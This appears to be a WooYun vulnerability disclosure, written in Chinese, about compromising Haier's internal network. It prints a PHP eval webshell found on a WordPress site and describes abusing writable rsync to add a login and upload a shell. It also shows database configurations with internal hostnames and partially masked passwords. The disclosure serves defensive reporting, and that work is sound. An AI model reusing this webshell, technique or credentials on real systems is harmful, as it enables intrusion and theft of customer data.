2014-12-03: 细节已通知厂商并且等待厂商处理中 2014-12-04: 厂商已经确认,细节仅向厂商公开 2014-12-14: 细节向核心白帽子及相关领域专家公开 2014-12-24: 细节向普通白帽子公开 2015-01-03: 细节向实习白帽子公开 2015-01-17: 细节向公众公开
海尔某遗留问题进入内网 加之 内网防护过于薄弱 可导致商城用户、订单库泄露
http://zixun.ehaier.com/ 为wordpress搭建对之前常见批量getshell特征匹配 成功找到一个后门http://zixun.ehaier.com/wp-content/themes/radius/404.php
后门创建时间为13-7-21
<?php @eval($_POST['pass']);?>
典型的php一句话如果进行过查杀很容易发现
uname -aLinux zixun-01.hst.ehaieridc.net 2.6.18-128.el5xen #1 SMP Wed Dec 17 12:01:40 EST 2008 x86_64 x86_64 x86_64 GNU/Linux
内核版本比较老 可以直接进行提权
对网络基本结构进行分析
发现基本通信都是在10.9.10.1/24网段进行本机已经安装了nmap,使用nmap对c段进行基本扫描经过筛选发现 10.9.10.135 开启了rsync未授权访问
web访问 10.9.10.135 开启了 401认证由于rsync可写 下载.htpasswd 然后添加一个用户test:123456登陆成功。然后同步一个shell上去,成功getshell。
内核版本与上一台一样,同样可以提权,不再证明。登陆时发现这web的功能是统计网站数据,包含用户、订单、访问等等猜测有连接数据库的关键文件查找配置文件,找到main_pro.php果然发现很多数据库配置
'db'=>array( 'class' => 'CDbConnection', 'connectionString' => 'mysql:host=10.9.10.61;dbname=db_mnt', 'emulatePrepare' => true, 'username' => 'imgfilter', 'password' => '*********', 'charset' => 'utf8', 'tablePrefix' => '', ), 'db_mobile_mnt'=>array( 'class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=db_mobile_mnt', 'emulatePrepare' => true, 'username' => 'report', 'password' => '*********', 'charset' => 'utf8', 'tablePrefix' => '', ), 'db_analysis' =>array( 'class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=ehaier_analysis_db', 'emulatePrepare' => true, 'username' => 'report', 'password' => '*********', 'charset' => 'utf8', 'tablePrefix' => 'tbl_', ), 'data_analysis' =>array( 'class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=data_analysis', 'emulatePrepare' => true, 'username' => 'report', 'password' => '*********', 'charset' => 'utf8', 'tablePrefix' => '', ), 'db_shop' =>array( 'class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=Shop', 'emulatePrepare' => true, 'username' => 'pec', 'password' => '*********', 'charset' => 'utf8', 'tablePrefix' => '', ), 'db_shopattributes' =>array( 'class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=ShopAttributes', 'emulatePrepare' => true, 'username' => 'pec', 'password' => '*********', 'charset' => 'utf8', 'tablePrefix' => '', ), 'db_stock' =>array( 'class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-cbs-rnd.vip.ehaieridc.net;dbname=db_stock', 'emulatePrepare' => true, 'username' => 'cbs_stock_ro', 'password' => '**********D)(]*********[zdF', 'charset' => 'utf8', 'tablePrefix' => '', ), 'db_eis' =>array( 'class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-cbs-wrt.vip.ehaieridc.net;dbname=db_eis', 'emulatePrepare' => true, 'username' => 'cbs_eis_ser', 'password' => 'cBs*{*********', 'charset' => 'utf8', 'tablePrefix' => '', ), 'db_mobile' =>array( 'class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-shop-rnd.vip.ehaieridc.net;dbname=m_shop', 'emulatePrepare' => true, 'username' => 'm_shop_ro', 'password' => '*********', 'charset' => 'utf8', 'tablePrefix' => '', ),
连接'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=Shop',的数据库
用户473w为了验证是线上数据库 我注册了一个账号 在数据库中马上查到了
订单
黑客入侵内网 无非就是想要这些 已经没有必要继续深入
边界安全做好 经常对服务器进行体检内网安全一样要做好
危害等级:高
漏洞Rank:12
确认时间:2014-12-04 16:11
感谢s0mun5与乌云平台的测试与提醒,我方已安排人员进行处理。
暂无
